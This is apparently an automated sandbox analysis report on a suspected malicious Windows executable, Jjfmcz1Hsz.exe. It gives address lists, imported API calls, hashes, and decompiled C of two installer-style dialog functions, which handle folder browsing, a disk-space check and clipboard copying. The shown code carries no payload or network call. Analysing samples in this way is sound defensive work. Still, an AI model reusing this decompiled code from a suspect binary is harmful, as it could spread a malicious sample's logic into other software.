                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405254
                                                                                                                                                                            0x00405237
                                                                                                                                                                            0x00405072
                                                                                                                                                                            0x00405076
                                                                                                                                                                            0x0040507e
                                                                                                                                                                            0x00405082
                                                                                                                                                                            0x00405085
                                                                                                                                                                            0x00405088
                                                                                                                                                                            0x0040508b
                                                                                                                                                                            0x0040508e
                                                                                                                                                                            0x0040508f
                                                                                                                                                                            0x00405090
                                                                                                                                                                            0x004050a9
                                                                                                                                                                            0x004050ac
                                                                                                                                                                            0x004050b6
                                                                                                                                                                            0x004050c5
                                                                                                                                                                            0x004050cd
                                                                                                                                                                            0x004050d5
                                                                                                                                                                            0x004050da
                                                                                                                                                                            0x004050dd
                                                                                                                                                                            0x004050e9
                                                                                                                                                                            0x004050f2
                                                                                                                                                                            0x004050fb
                                                                                                                                                                            0x0040511d
                                                                                                                                                                            0x00405123
                                                                                                                                                                            0x00405134
                                                                                                                                                                            0x00405139
                                                                                                                                                                            0x00405147
                                                                                                                                                                            0x00405155
                                                                                                                                                                            0x00405155
                                                                                                                                                                            0x0040515a
                                                                                                                                                                            0x00405168
                                                                                                                                                                            0x00405168
                                                                                                                                                                            0x0040516d
                                                                                                                                                                            0x00405170
                                                                                                                                                                            0x00405175
                                                                                                                                                                            0x00405181
                                                                                                                                                                            0x0040518a
                                                                                                                                                                            0x00405197
                                                                                                                                                                            0x004051a6
                                                                                                                                                                            0x00405199
                                                                                                                                                                            0x0040519e
                                                                                                                                                                            0x0040519e
                                                                                                                                                                            0x004051b2
                                                                                                                                                                            0x004051b2
                                                                                                                                                                            0x004051c6
                                                                                                                                                                            0x004051cf
                                                                                                                                                                            0x004051d8
                                                                                                                                                                            0x004051e8
                                                                                                                                                                            0x004051f4
                                                                                                                                                                            0x004051f4
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004050AF
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004050BE
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004050FB
                                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405102
                                                                                                                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405123
                                                                                                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405134
                                                                                                                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405147
                                                                                                                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405155
                                                                                                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405168
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518A
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040519E
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004051BF
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051CF
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051E8
                                                                                                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F4
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004050CD
                                                                                                                                                                              • Part of subcall function 00403F13: SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405210
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00004FE4,00000000), ref: 0040521E
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405225
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405248
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040524F
                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405295
                                                                                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052C9
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004052DA
                                                                                                                                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052EF
                                                                                                                                                                            • GetWindowRect.USER32(?,000000FF), ref: 0040530F
                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405328
                                                                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405364
                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405374
                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040537A
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405383
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040538D
                                                                                                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A1
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004053BA
                                                                                                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 004053C5
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004053CB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 590372296-0
                                                                                                                                                                            • Opcode ID: 110982b3b6e043dfb772c6262222abcf173b3562f202fb6bb9697052539c2ca3
                                                                                                                                                                            • Instruction ID: 36ba5585b1d224b9782629df23ee11add298fe1a6f2e37662bad4ed6ffe984ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 110982b3b6e043dfb772c6262222abcf173b3562f202fb6bb9697052539c2ca3
                                                                                                                                                                            • Instruction Fuzzy Hash: 46A159B1900208BFDB119FA0DD85AAE7F79FB48355F10407AFA01B61A0C7B55E41DF69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                            			E0040431C(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				long _v16;
                                                                                                                                                                            				long _v20;
                                                                                                                                                                            				long _v24;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				long _v36;
                                                                                                                                                                            				char _v40;
                                                                                                                                                                            				unsigned int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				CHAR* _v56;
                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				CHAR* _v72;
                                                                                                                                                                            				void _v76;
                                                                                                                                                                            				struct HWND__* _v80;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                            				long _t87;
                                                                                                                                                                            				signed char* _t89;
                                                                                                                                                                            				void* _t95;
                                                                                                                                                                            				signed int _t96;
                                                                                                                                                                            				int _t109;
                                                                                                                                                                            				signed char _t114;
                                                                                                                                                                            				signed int _t118;
                                                                                                                                                                            				struct HWND__** _t122;
                                                                                                                                                                            				intOrPtr* _t138;
                                                                                                                                                                            				CHAR* _t146;
                                                                                                                                                                            				intOrPtr _t147;
                                                                                                                                                                            				unsigned int _t150;
                                                                                                                                                                            				signed int _t152;
                                                                                                                                                                            				unsigned int _t156;
                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                            				signed int* _t159;
                                                                                                                                                                            				signed char* _t160;
                                                                                                                                                                            				struct HWND__* _t165;
                                                                                                                                                                            				struct HWND__* _t166;
                                                                                                                                                                            				int _t168;
                                                                                                                                                                            				unsigned int _t197;
                                                                                                                                                                            
                                                                                                                                                                            				_t156 = __edx;
                                                                                                                                                                            				_t82 =  *0x41f4e0;
                                                                                                                                                                            				_v32 = _t82;
                                                                                                                                                                            				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x424000;
                                                                                                                                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                                                                            				if(_a8 == 0x40b) {
                                                                                                                                                                            					E004054D3(0x3fb, _t146);
                                                                                                                                                                            					E00405F64(_t146);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t166 = _a4;
                                                                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                                                                            					L8:
                                                                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                                                                            						L20:
                                                                                                                                                                            						if(_a8 == 0x40f) {
                                                                                                                                                                            							L22:
                                                                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                                                                            							_v12 = _v12 & 0x00000000;
                                                                                                                                                                            							E004054D3(0x3fb, _t146);
                                                                                                                                                                            							if(E00405859(_t185, _t146) == 0) {
                                                                                                                                                                            								_v8 = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            							E00405CF9(0x41ecd8, _t146);
                                                                                                                                                                            							_t87 = E00406092(1);
                                                                                                                                                                            							_v16 = _t87;
                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                            								L30:
                                                                                                                                                                            								E00405CF9(0x41ecd8, _t146);
                                                                                                                                                                            								_t89 = E00405804(0x41ecd8);
                                                                                                                                                                            								_t158 = 0;
                                                                                                                                                                            								if(_t89 != 0) {
                                                                                                                                                                            									 *_t89 =  *_t89 & 0x00000000;
                                                                                                                                                                            								}
                                                                                                                                                                            								if(GetDiskFreeSpaceA(0x41ecd8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                                                                            									goto L35;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t168 = 0x400;
                                                                                                                                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                                                                            									asm("cdq");
                                                                                                                                                                            									_v48 = _t109;
                                                                                                                                                                            									_v44 = _t156;
                                                                                                                                                                            									_v12 = 1;
                                                                                                                                                                            									goto L36;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t159 = 0;
                                                                                                                                                                            								if(0 == 0x41ecd8) {
                                                                                                                                                                            									goto L30;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L26;
                                                                                                                                                                            								}
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L26:
                                                                                                                                                                            									_t114 = _v16(0x41ecd8,  &_v48,  &_v28,  &_v40);
                                                                                                                                                                            									if(_t114 != 0) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									if(_t159 != 0) {
                                                                                                                                                                            										 *_t159 =  *_t159 & _t114;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t160 = E004057B2(0x41ecd8);
                                                                                                                                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                                                                            									_t159 = _t160 - 1;
                                                                                                                                                                            									 *_t159 = 0x5c;
                                                                                                                                                                            									if(_t159 != 0x41ecd8) {
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								_t150 = _v44;
                                                                                                                                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                                                                            								_v44 = _t150 >> 0xa;
                                                                                                                                                                            								_v12 = 1;
                                                                                                                                                                            								_t158 = 0;
                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                            								L35:
                                                                                                                                                                            								_t168 = 0x400;
                                                                                                                                                                            								L36:
                                                                                                                                                                            								_t95 = E004047B0(5);
                                                                                                                                                                            								if(_v12 != _t158) {
                                                                                                                                                                            									_t197 = _v44;
                                                                                                                                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                                                                            										_v8 = 2;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								_t147 =  *0x422edc; // 0x70e974
                                                                                                                                                                            								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                                                                            									E00404798(0x3ff, 0xfffffffb, _t95);
                                                                                                                                                                            									if(_v12 == _t158) {
                                                                                                                                                                            										SetDlgItemTextA(_a4, _t168, 0x41ecc8);
                                                                                                                                                                            									} else {
                                                                                                                                                                            										E004046D3(_t168, 0xfffffffc, _v48, _v44);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								_t96 = _v8;
                                                                                                                                                                            								 *0x4237a4 = _t96;
                                                                                                                                                                            								if(_t96 == _t158) {
                                                                                                                                                                            									_v8 = E0040140B(7);
                                                                                                                                                                            								}
                                                                                                                                                                            								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                                                                                            									_v8 = _t158;
                                                                                                                                                                            								}
                                                                                                                                                                            								E00403F00(0 | _v8 == _t158);
                                                                                                                                                                            								if(_v8 == _t158 &&  *0x41fcf8 == _t158) {
                                                                                                                                                                            									E004042B1();
                                                                                                                                                                            								}
                                                                                                                                                                            								 *0x41fcf8 = _t158;
                                                                                                                                                                            								goto L53;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t185 = _a8 - 0x405;
                                                                                                                                                                            						if(_a8 != 0x405) {
                                                                                                                                                                            							goto L53;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L22;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                                                                                                                            					if(_t118 != 0x3fb) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						if(_t118 == 0x3e9) {
                                                                                                                                                                            							_t152 = 7;
                                                                                                                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                                                                                                                            							_v80 = _t166;
                                                                                                                                                                            							_v72 = 0x41fd08;
                                                                                                                                                                            							_v60 = E0040466D;
                                                                                                                                                                            							_v56 = _t146;
                                                                                                                                                                            							_v68 = E00405D1B(_t146, 0x41fd08, _t166, 0x41f0e0, _v12);
                                                                                                                                                                            							_t122 =  &_v80;
                                                                                                                                                                            							_v64 = 0x41;
                                                                                                                                                                            							__imp__SHBrowseForFolderA(_t122);
                                                                                                                                                                            							if(_t122 == 0) {
                                                                                                                                                                            								_a8 = 0x40f;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__imp__CoTaskMemFree(_t122);
                                                                                                                                                                            								E0040576B(_t146);
                                                                                                                                                                            								_t125 =  *((intOrPtr*)( *0x423710 + 0x11c));
                                                                                                                                                                            								if( *((intOrPtr*)( *0x423710 + 0x11c)) != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical") {
                                                                                                                                                                            									E00405D1B(_t146, 0x41fd08, _t166, 0, _t125);
                                                                                                                                                                            									if(lstrcmpiA(0x4226a0, 0x41fd08) != 0) {
                                                                                                                                                                            										lstrcatA(_t146, 0x4226a0);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								 *0x41fcf8 =  *0x41fcf8 + 1;
                                                                                                                                                                            								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L20;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                                            						goto L53;
                                                                                                                                                                            					}
                                                                                                                                                                            					_a8 = 0x40f;
                                                                                                                                                                            					goto L12;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                                                                                            					if(E004057D8(_t146) != 0 && E00405804(_t146) == 0) {
                                                                                                                                                                            						E0040576B(_t146);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x422ed8 = _t166;
                                                                                                                                                                            					SetWindowTextA(_t165, _t146);
                                                                                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                                            					_push(1);
                                                                                                                                                                            					E00403EDE(_t166);
                                                                                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                            					_push(0x14);
                                                                                                                                                                            					E00403EDE(_t166);
                                                                                                                                                                            					E00403F13(_t165);
                                                                                                                                                                            					_t138 = E00406092(6);
                                                                                                                                                                            					if(_t138 == 0) {
                                                                                                                                                                            						L53:
                                                                                                                                                                            						return E00403F45(_a8, _a12, _a16);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *_t138(_t165, 1);
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}














































                                                                                                                                                                            0x0040431c
                                                                                                                                                                            0x00404322
                                                                                                                                                                            0x00404328
                                                                                                                                                                            0x00404335
                                                                                                                                                                            0x00404343
                                                                                                                                                                            0x00404346
                                                                                                                                                                            0x0040434e
                                                                                                                                                                            0x00404354
                                                                                                                                                                            0x00404354
                                                                                                                                                                            0x00404360
                                                                                                                                                                            0x00404363
                                                                                                                                                                            0x004043d1
                                                                                                                                                                            0x004043d8
                                                                                                                                                                            0x004044af
                                                                                                                                                                            0x004044b6
                                                                                                                                                                            0x004044c5
                                                                                                                                                                            0x004044c5
                                                                                                                                                                            0x004044c9
                                                                                                                                                                            0x004044d3
                                                                                                                                                                            0x004044e0
                                                                                                                                                                            0x004044e2
                                                                                                                                                                            0x004044e2
                                                                                                                                                                            0x004044f0
                                                                                                                                                                            0x004044f7
                                                                                                                                                                            0x004044fe
                                                                                                                                                                            0x00404501
                                                                                                                                                                            0x00404538
                                                                                                                                                                            0x0040453a
                                                                                                                                                                            0x00404540
                                                                                                                                                                            0x00404545
                                                                                                                                                                            0x00404549
                                                                                                                                                                            0x0040454b
                                                                                                                                                                            0x0040454b
                                                                                                                                                                            0x00404567
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404569
                                                                                                                                                                            0x0040456c
                                                                                                                                                                            0x0040457a
                                                                                                                                                                            0x00404580
                                                                                                                                                                            0x00404581
                                                                                                                                                                            0x00404584
                                                                                                                                                                            0x00404587
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404587
                                                                                                                                                                            0x00404503
                                                                                                                                                                            0x00404505
                                                                                                                                                                            0x00404509
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040450b
                                                                                                                                                                            0x0040450b
                                                                                                                                                                            0x00404518
                                                                                                                                                                            0x0040451d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404521
                                                                                                                                                                            0x00404523
                                                                                                                                                                            0x00404523
                                                                                                                                                                            0x0040452b
                                                                                                                                                                            0x0040452d
                                                                                                                                                                            0x00404530
                                                                                                                                                                            0x00404533
                                                                                                                                                                            0x00404536
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404536
                                                                                                                                                                            0x00404593
                                                                                                                                                                            0x0040459d
                                                                                                                                                                            0x004045a0
                                                                                                                                                                            0x004045a3
                                                                                                                                                                            0x004045aa
                                                                                                                                                                            0x004045aa
                                                                                                                                                                            0x004045ac
                                                                                                                                                                            0x004045ac
                                                                                                                                                                            0x004045b1
                                                                                                                                                                            0x004045b3
                                                                                                                                                                            0x004045bb
                                                                                                                                                                            0x004045c2
                                                                                                                                                                            0x004045c4
                                                                                                                                                                            0x004045cf
                                                                                                                                                                            0x004045cf
                                                                                                                                                                            0x004045c4
                                                                                                                                                                            0x004045d6
                                                                                                                                                                            0x004045df
                                                                                                                                                                            0x004045e9
                                                                                                                                                                            0x004045f1
                                                                                                                                                                            0x0040460c
                                                                                                                                                                            0x004045f3
                                                                                                                                                                            0x004045fc
                                                                                                                                                                            0x004045fc
                                                                                                                                                                            0x004045f1
                                                                                                                                                                            0x00404611
                                                                                                                                                                            0x00404616
                                                                                                                                                                            0x0040461b
                                                                                                                                                                            0x00404624
                                                                                                                                                                            0x00404624
                                                                                                                                                                            0x0040462d
                                                                                                                                                                            0x0040462f
                                                                                                                                                                            0x0040462f
                                                                                                                                                                            0x0040463b
                                                                                                                                                                            0x00404643
                                                                                                                                                                            0x0040464d
                                                                                                                                                                            0x0040464d
                                                                                                                                                                            0x00404652
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404652
                                                                                                                                                                            0x00404501
                                                                                                                                                                            0x004044b8
                                                                                                                                                                            0x004044bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004044bf
                                                                                                                                                                            0x004043de
                                                                                                                                                                            0x004043e7
                                                                                                                                                                            0x00404401
                                                                                                                                                                            0x00404406
                                                                                                                                                                            0x00404410
                                                                                                                                                                            0x00404417
                                                                                                                                                                            0x00404423
                                                                                                                                                                            0x00404426
                                                                                                                                                                            0x00404429
                                                                                                                                                                            0x00404430
                                                                                                                                                                            0x00404438
                                                                                                                                                                            0x0040443b
                                                                                                                                                                            0x0040443f
                                                                                                                                                                            0x00404446
                                                                                                                                                                            0x0040444e
                                                                                                                                                                            0x004044a8
                                                                                                                                                                            0x00404450
                                                                                                                                                                            0x00404451
                                                                                                                                                                            0x00404458
                                                                                                                                                                            0x00404462
                                                                                                                                                                            0x0040446a
                                                                                                                                                                            0x00404477
                                                                                                                                                                            0x0040448b
                                                                                                                                                                            0x0040448f
                                                                                                                                                                            0x0040448f
                                                                                                                                                                            0x0040448b
                                                                                                                                                                            0x00404494
                                                                                                                                                                            0x004044a1
                                                                                                                                                                            0x004044a1
                                                                                                                                                                            0x0040444e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404406
                                                                                                                                                                            0x004043f4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004043fa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404365
                                                                                                                                                                            0x00404372
                                                                                                                                                                            0x0040437b
                                                                                                                                                                            0x00404388
                                                                                                                                                                            0x00404388
                                                                                                                                                                            0x0040438f
                                                                                                                                                                            0x00404395
                                                                                                                                                                            0x0040439e
                                                                                                                                                                            0x004043a1
                                                                                                                                                                            0x004043a4
                                                                                                                                                                            0x004043ac
                                                                                                                                                                            0x004043af
                                                                                                                                                                            0x004043b2
                                                                                                                                                                            0x004043b8
                                                                                                                                                                            0x004043bf
                                                                                                                                                                            0x004043c6
                                                                                                                                                                            0x00404658
                                                                                                                                                                            0x0040466a
                                                                                                                                                                            0x004043cc
                                                                                                                                                                            0x004043cf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004043cf
                                                                                                                                                                            0x004043c6

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040436B
                                                                                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 00404395
                                                                                                                                                                            • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404446
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404451
                                                                                                                                                                            • lstrcmpiA.KERNEL32(Call,0041FD08), ref: 00404483
                                                                                                                                                                            • lstrcatA.KERNEL32(?,Call), ref: 0040448F
                                                                                                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A1
                                                                                                                                                                              • Part of subcall function 004054D3: GetDlgItemTextA.USER32(?,?,00000400,004044D8), ref: 004054E6
                                                                                                                                                                              • Part of subcall function 00405F64: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",76803410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FBC
                                                                                                                                                                              • Part of subcall function 00405F64: CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
                                                                                                                                                                              • Part of subcall function 00405F64: CharNextA.USER32(?,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",76803410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FCE
                                                                                                                                                                              • Part of subcall function 00405F64: CharPrevA.USER32(?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FDE
                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040455F
                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457A
                                                                                                                                                                              • Part of subcall function 004046D3: lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
                                                                                                                                                                              • Part of subcall function 004046D3: wsprintfA.USER32 ref: 00404779
                                                                                                                                                                              • Part of subcall function 004046D3: SetDlgItemTextA.USER32(?,0041FD08), ref: 0040478C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical$Call$tp
                                                                                                                                                                            • API String ID: 2624150263-3124282417
                                                                                                                                                                            • Opcode ID: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
                                                                                                                                                                            • Instruction ID: 222947b4accbc62cc0073c5541b0f9589876626f1104fcc3d8441c992cea6716
                                                                                                                                                                            • Opcode Fuzzy Hash: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
                                                                                                                                                                            • Instruction Fuzzy Hash: 71A17EB1900209ABDB11AFA5CC45BEFB6B8EF84315F14843BF711B62D1D77C8A418B69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3320000_Jjfmcz1Hsz.jbxd
